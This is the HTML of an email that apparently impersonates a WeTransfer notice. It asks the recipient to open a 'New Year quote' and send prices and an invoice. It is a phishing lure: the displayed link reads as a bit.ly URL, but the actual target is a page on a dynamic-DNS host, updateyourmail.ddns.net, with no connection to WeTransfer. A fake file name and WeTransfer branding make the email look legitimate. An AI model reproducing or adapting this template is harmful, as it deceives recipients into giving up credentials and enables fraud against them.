<div>&nbsp;</div>
<div>
<div style="margin: 0; padding: 0;">
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0;" border="0" width="100%" cellspacing="0" cellpadding="0" bgcolor="#F4F4F4">
<tbody>
<tr>
<td style="width: 100%; margin: 0; padding: 0;" align="left" valign="top">
<div>
<table style="border-collapse: collapse; border-spacing: 0; margin: 0 auto; min-width: 600px; padding: 0; width: 600px;" border="0" width="600" cellspacing="0" cellpadding="0" align="center">
<tbody>
<tr>
<td style="width: 600px; min-width: 600px; margin: 0; padding: 0;" align="left" valign="top" width="600">
<table style="border-collapse: collapse; border-spacing: 0; font-size: 0; margin: 0; max-height: 0; padding: 0; width: 0;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="font-size: 0; margin: 0; max-height: 0; padding: 0; width: 0;" align="left" valign="top">
</tr>
</tbody>
</table>
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; margin: 0; padding: 55px 0 0;" align="left" valign="top">
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; font-size: 10px; background: url('https://prod-cdn.wetransfer.net/assets/email/v2/header/timallen-b48eab3084e797b71cd2db1c9856ad53d2142c96f61caa8fed613342ee02a00d.png') no-repeat top center/cover; margin: 0; padding: 0;" align="left" valign="top" bgcolor="#409FFF">
<div>
<table style="border-collapse: collapse; border-spacing: 0; margin: 0 auto; padding: 0; width: auto;" border="0" cellspacing="0" cellpadding="0" align="center">
<tbody>
<tr>
<td style="height: 16px; width: 100%; margin: 0; padding: 0;" align="left" valign="top" height="16px">&nbsp;</td>
</tr>
<tr>
<td style="width: 100%; margin: 0; padding: 0;" align="left" valign="top"><a href="javascript:void(0)" target="_blank"><img style="border: none; height: auto; line-height: 100%; margin: 0; padding: 0; text-decoration: none; width: 56px !important;" src="https://prod-cdn.wetransfer.net/assets/email/v2/logos/white_2x-f4cfc880393aea615941f54a0ec4fc3745378c8c3e2699d852c8fced5562f10d.png" alt="Click 'Download images' to view images" width="56" align="center" border="0" /> </a></td>
</tr>
<tr>
<td style="height: 11px; width: 100%; margin: 0; padding: 0;" align="left" valign="top" height="11px">&nbsp;</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>



</table>
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF">
<tbody>
<tr>
<td style="width: 100%; margin: 0; padding: 0;" align="left" valign="top">
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; margin: 0; padding: 0;" align="left" valign="top">
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>

</tr>
<tr>
<td style="width: 100%; color: #000; font-family: 'Fakt Pro','Segoe UI','SanFrancisco Display',Arial,sans-serif; font-size: 14px; font-style: normal; font-weight: normal; line-height: 23px; margin: 0; padding: 20px 80px 0;" align="left" valign="top">Kindly check Below link attached in Wetransfer for the new quote i want you to send prices, and also, revert with your prepared invoice.
<br></br>
We look forward to hearing from you.</td>
</tr>
 
<tr>
<td style="width: 100%; margin: 0; padding: 40px 80px 0;" align="left" valign="top">
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; border-bottom-width: 2px; border-bottom-color: #F4F4F4; border-bottom-style: solid; font-size: 1px; line-height: 0; margin: 0; padding: 0;" align="left" valign="top">&nbsp;</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style="width: 100%; color: #797c7f; font-family: 'Fakt Pro','Segoe UI','SanFrancisco Display',Arial,sans-serif; font-size: 14px; font-style: normal; font-weight: normal; line-height: 24px; margin: 0; padding: 50px 80px 0;" align="left" valign="top"><span style="color: #17181a; font-family: freightsans pro,segoe ui,sanfrancisco display,arial,sans-serif; font-size: 18px; font-weight: 500;">Recipients </span><br /><a style="color: #409fff; font-family: 'Fakt Pro Medium','Segoe UI','SanFrancisco Display',Arial,sans-serif; text-decoration: none; font-weight: normal;" target="_blank"><span style="color: #409fff; font-weight: normal; text-decoration: none;">Quote 92118 New Year</span></a></td>
</tr>
<tr>
<td style="width: 100%; color: #797c7f; font-family: 'Fakt Pro','Segoe UI','SanFrancisco Display',Arial,sans-serif; font-size: 14px; font-style: normal; font-weight: normal; line-height: 24px; word-break: break-all; margin: 0; padding: 50px 80px 0;" align="left" valign="top"><span style="color: #17181a; font-family: freightsans pro,segoe ui,sanfrancisco display,arial,sans-serif; font-size: 18px; font-weight: 500;">Download link </span><br /><a style="color: #17181a; font-family: 'Fakt Pro Medium','Segoe UI','SanFrancisco Display',Arial,sans-serif; text-decoration: underline; font-weight: normal;" href="https://updateyourmail.ddns.net/New-Year-Quote/" target="_blank"><u>https://bit.ly/2ZPmbxC</u> </a></td>
</tr>
<tr>
<td style="width: 100%; color: #797c7f; font-family: 'Fakt Pro','Segoe UI','SanFrancisco Display',Arial,sans-serif; font-size: 14px; font-style: normal; font-weight: normal; line-height: 24px; margin: 0; padding: 50px 80px 0;" align="left" valign="top"><span style="color: #17181a; font-family: freightsans pro,segoe ui,sanfrancisco display,arial,sans-serif; font-size: 18px; font-weight: 500;">1 file </span><br />boardblueprint.pdf</td>
</tr>
<tr>
<td style="width: 100%; color: #797c7f; font-family: 'Fakt Pro','Segoe UI','SanFrancisco Display',Arial,sans-serif; font-size: 14px; font-style: normal; font-weight: normal; line-height: 24px; margin: 0; padding: 50px 80px;" align="left" valign="top"><span style="color: #17181a; font-family: freightsans pro,segoe ui,sanfrancisco display,arial,sans-serif; font-size: 18px; font-weight: 500;">Message </span><br />Orange electric</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; margin: 0; padding: 2px 0 0;" align="left" valign="top">
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF">
<tbody>
<tr>
<td style="width: 100%; margin: 0; padding: 0 20px;" align="left" valign="top">
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; color: #797c7f; font-family: 'Fakt Pro','Segoe UI','SanFrancisco Display',Arial,sans-serif; font-size: 12px; font-style: normal; font-weight: normal; line-height: 24px; margin: 0; padding: 13px 0;" align="center" valign="top">
<p style="margin: 0; padding: 0;">To make sure our emails arrive, please add <a style="color: #797c7f; font-weight: normal; text-decoration: none !important;" target="_blank"><span style="color: #797c7f; font-weight: normal; text-decoration: none !important;">noreply@wetransfer.com</span></a> to <a style="color: #797c7f; font-weight: normal; text-decoration: underline;" href="https://wetransfer.zendesk.com/hc/en-us/articles/204909429?utm_campaign=WT_email_tracking&amp;utm_source=notify_sender_on_upload_success_email&amp;utm_medium=Add+Us+To+Your+Contacts+Link&amp;utm_content=general" target="_blank">your contacts</a>.</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="border-collapse: collapse; border-spacing: 0; margin: 0; padding: 0; width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; color: #797c7f; font-family: 'Fakt Pro','Segoe UI','SanFrancisco Display',Arial,sans-serif; font-size: 12px; font-style: normal; font-weight: normal; line-height: 23px; margin: 0; padding: 30px 20px;" align="center" valign="top">
<p style="margin: 0; padding: 0;"><a style="color: #17181a; font-family: 'Fakt Pro Medium','Segoe UI','SanFrancisco Display',Arial,sans-serif; text-decoration: underline;" href="" target="_blank">Get more out of WeTransfer, get Plus</a></p>
<a style="color: #797c7f; font-weight: normal; text-decoration: underline;" href="" target="_blank"><u>About WeTransfer</u></a> <span style="color: #797c7f;">&nbsp;&nbsp;・&nbsp;&nbsp;</span> <a style="color: #797c7f; font-weight: normal; text-decoration: underline;" href="" target="_blank"> <u>Help</u></a> <span style="color: #797c7f;">&nbsp;&nbsp;・&nbsp;&nbsp;</span> <a style="color: #797c7f; font-weight: normal; text-decoration: underline;" href="" target="_blank"> <u>Legal</u></a> <span style="color: #797c7f;">&nbsp;&nbsp;・&nbsp;&nbsp;</span> <a style="color: #797c7f; font-weight: normal; text-decoration: underline;" href="" target="_blank"> <u>Report this transfer</u></a></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
<div style="color: #ffffff; font: 20px courier; white-space: nowrap;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</div>
</div>
</div>